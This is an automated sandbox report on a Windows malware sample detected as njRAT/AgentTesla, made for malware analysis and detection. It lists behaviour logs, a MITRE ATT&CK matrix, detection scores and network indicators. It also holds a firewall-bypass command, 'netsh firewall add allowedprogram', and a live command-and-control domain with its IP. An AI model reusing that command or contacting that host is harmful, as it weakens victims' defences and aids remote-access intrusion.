        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_000184C7 GetLocalTime,swprintf,2_2_000184C7
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_00018E9C GetTimeZoneInformation,GetSystemTime,SystemTimeToTzSpecificLocalTime,2_2_00018E9C
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_00028FF5 GetVersion,GetModuleHandleW,GetProcAddress,2_2_00028FF5

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Uses netsh to modify the Windows network and firewall settings
        Source: C:\ProgramData\essam@sasa2023.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\ProgramData\essam@sasa2023.exe" "essam@sasa2023.exe" ENABLE
        Modifies the windows firewall
        Source: C:\ProgramData\essam@sasa2023.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\ProgramData\essam@sasa2023.exe" "essam@sasa2023.exe" ENABLE
        Source: essam@sasa2023.exe, 00000003.00000002.4193957410.0000000000F10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\AVG\Antivirus\AVGUI.exe
        Source: essam@sasa2023.exe, 00000003.00000002.4199118899.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, essam@sasa2023.exe, 00000003.00000002.4199118899.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, essam@sasa2023.exe, 00000003.00000002.4199118899.000000000317F000.00000004.00000800.00020000.00000000.sdmp, essam@sasa2023.exe, 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -|k/.C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe
        Source: essam@sasa2023.exe, 00000003.00000002.4193957410.0000000000F10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe
        Source: essam@sasa2023.exe, 00000003.00000002.4199118899.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, essam@sasa2023.exe, 00000003.00000002.4199118899.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, essam@sasa2023.exe, 00000003.00000002.4199118899.000000000317F000.00000004.00000800.00020000.00000000.sdmp, essam@sasa2023.exe, 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -|k)(C:\Program Files\AVG\Antivirus\AVGUI.exe

        Stealing of Sensitive Information

        barindex
        Yara detected Njrat
        Source: Yara matchFile source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.essam@sasa2023.exe.2aea0a4.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.essam@sasa2023.exe.2aeb7cc.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000003.00000002.4199118899.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: essam@sasa2023.exe PID: 7172, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: essam@sasa2023.exe PID: 7648, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected Njrat
        Source: Yara matchFile source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.essam@sasa2023.exe.2aea0a4.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.essam@sasa2023.exe.2aeb7cc.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000003.00000002.4199118899.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: essam@sasa2023.exe PID: 7172, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: essam@sasa2023.exe PID: 7648, type: MEMORYSTR

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts11
        Scripting        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		211
        Disable or Modify Tools        		1
        Input Capture        		2
        System Time Discovery        		Remote Services11
        Archive Collected Data        		Exfiltration Over Other Network Medium1
        Ingress Tool Transfer        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
        System Shutdown/Reboot
        Default Accounts14
        Native API        		11
        Windows Service        		1
        Access Token Manipulation        		11
        Deobfuscate/Decode Files or Information        		LSASS Memory4
        File and Directory Discovery        		Remote Desktop Protocol1
        Input Capture        		Exfiltration Over Bluetooth2
        Encrypted Channel        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain Accounts3
        Command and Scripting Interpreter        		2
        Registry Run Keys / Startup Folder        		11
        Windows Service        		11
        Scripting        		Security Account Manager18
        System Information Discovery        		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
        Non-Standard Port        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local Accounts2
        Service Execution        		Logon Script (Mac)11
        Process Injection        		3
        Obfuscated Files or Information        		NTDS131
        Security Software Discovery        		Distributed Component Object ModelInput CaptureScheduled Transfer1
        Non-Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon Script2
        Registry Run Keys / Startup Folder        		12
        Software Packing        		LSA Secrets21
        Virtualization/Sandbox Evasion        		SSHKeyloggingData Transfer Size Limits21
        Application Layer Protocol        		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common1
        DLL Side-Loading        		Cached Domain Credentials2
        Process Discovery        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items1
        Masquerading        		DCSync1
        Application Window Discovery        		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job21
        Virtualization/Sandbox Evasion        		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
        Access Token Manipulation        		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)11
        Process Injection        		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1336857 Sample: ESjy0irMIn.exe Startdate: 03/11/2023 Architecture: WINDOWS Score: 100 55 bmw2022.ddns.net 2->55 65 Found malware configuration 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 Antivirus / Scanner detection for submitted sample 2->69 71 9 other signatures 2->71 10 ESjy0irMIn.exe 6 2->10         started        13 wscript.exe 1 1 2->13         started        signatures3 process4 file5 49 C:\ProgramData\essam@sasa2023.exe, PE32 10->49 dropped 51 C:\ProgramData\dotNetFx40_Client_setup.exe, PE32 10->51 dropped 16 essam@sasa2023.exe 3 5 10->16         started        21 dotNetFx40_Client_setup.exe 136 10->21         started        73 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->73 23 essam@sasa2023.exe 13->23         started        25 essam@sasa2023.exe 13->25         started        signatures6 process7 dnsIp8 53 bmw2022.ddns.net 156.196.162.149, 49734, 49738, 49741 TE-ASTE-ASEG Egypt 16->53 39 C:\Users\user\AppData\Roaming\...39ame.js, ASCII 16->39 dropped 57 Antivirus detection for dropped file 16->57 59 Multi AV Scanner detection for dropped file 16->59 61 Drops script or batch files to the startup folder 16->61 63 3 other signatures 16->63 27 netsh.exe 2 16->27         started        41 C:\b53dd3b256ba71dad061693a386e\sqmapi.dll, PE32 21->41 dropped 43 C:\...\SetupUtility.exe, PE32 21->43 dropped 45 C:\b53dd3b256ba71dad061693a386e\SetupUi.dll, PE32 21->45 dropped 47 27 other files (none is malicious) 21->47 dropped 29 Setup.exe 4 9 21->29         started        file9 signatures10 process11 process12 31 conhost.exe 27->31         started        33 WINWORD.EXE 29->33         started        35 WINWORD.EXE 29->35         started        process13 37 splwow64.exe 33->37         started       

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        ESjy0irMIn.exe74%ReversingLabsByteCode-MSIL.Trojan.Razy
        ESjy0irMIn.exe100%AviraHEUR/AGEN.1305400
        ESjy0irMIn.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\ProgramData\essam@sasa2023.exe100%AviraHEUR/AGEN.1305400
        C:\ProgramData\essam@sasa2023.exe100%Joe Sandbox ML
        C:\ProgramData\dotNetFx40_Client_setup.exe0%ReversingLabs
        C:\ProgramData\essam@sasa2023.exe79%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
        C:\b53dd3b256ba71dad061693a386e\1025\SetupResources.dll0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\1028\SetupResources.dll0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\1029\SetupResources.dll0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\1030\SetupResources.dll0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\1031\SetupResources.dll0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\1032\SetupResources.dll0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\1033\SetupResources.dll0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\1035\SetupResources.dll0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\1036\SetupResources.dll0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\1037\SetupResources.dll0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\1038\SetupResources.dll0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\1040\SetupResources.dll0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\1041\SetupResources.dll0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\1042\SetupResources.dll0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\1043\SetupResources.dll0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\1044\SetupResources.dll0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\1045\SetupResources.dll0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\1046\SetupResources.dll0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\1049\SetupResources.dll0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\1053\SetupResources.dll0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\1055\SetupResources.dll0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\2052\SetupResources.dll0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\2070\SetupResources.dll0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\3076\SetupResources.dll0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\3082\SetupResources.dll0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\Setup.exe0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\SetupEngine.dll0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\SetupUi.dll0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\SetupUtility.exe0%ReversingLabs
        C:\b53dd3b256ba71dad061693a386e\sqmapi.dll0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://cdn.entity.0%URL Reputationsafe
        https://powerlift.acompli.net0%URL Reputationsafe
        https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
        https://cortana.ai0%URL Reputationsafe
        https://api.aadrm.com/0%URL Reputationsafe
        http://www.sajatypeworks.com0%URL Reputationsafe
        https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
        http://www.urwpp.deDPlease0%URL Reputationsafe
        https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
        https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
        https://officeci.azurewebsites.net/api/0%URL Reputationsafe
        https://api.scheduler.0%URL Reputationsafe
        https://my.microsoftpersonalcontent.com0%URL Reputationsafe
        https://store.office.cn/addinstemplate0%URL Reputationsafe
        https://api.aadrm.com0%URL Reputationsafe
        https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
        https://www.odwebp.svc.ms0%URL Reputationsafe
        https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
        https://dataservice.o365filtering.com/0%URL Reputationsafe
        https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
        http://www.carterandcone.coml0%URL Reputationsafe
        https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
        https://ncus.contentsync.0%URL Reputationsafe
        https://apis.live.net/v5.0/0%URL Reputationsafe
        https://wus2.contentsync.0%URL Reputationsafe
        https://make.powerautomate.com0%URL Reputationsafe
        http://www.tiro.com0%URL Reputationsafe
        https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
        https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
        http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
        https://d.docs.live.net0%Avira URL Cloudsafe
        http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
        http://www.zhongyicts.com.cn0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        bmw2022.ddns.net
        		156.196.162.149
        		truetrue
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://api.diagnosticssdf.office.comDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
            		high
            https://login.microsoftonline.com/DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
              		high
              https://shell.suite.office.com:1443DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                		high
                https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                  		high
                  https://autodiscover-s.outlook.com/DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                    		high
                    https://useraudit.o365auditrealtimeingestion.manage.office.comDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                      		high
                      https://outlook.office365.com/connectorsDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                        		high
                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                          		high
                          https://cdn.entity.E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.addins.omex.office.net/appinfo/queryDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                            		high
                            https://clients.config.office.net/user/v1.0/tenantassociationkeyE07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                              		high
                              https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                		high
                                https://powerlift.acompli.netDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://rpsticket.partnerservices.getmicrosoftkey.comDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                • URL Reputation: safe
                                		unknown
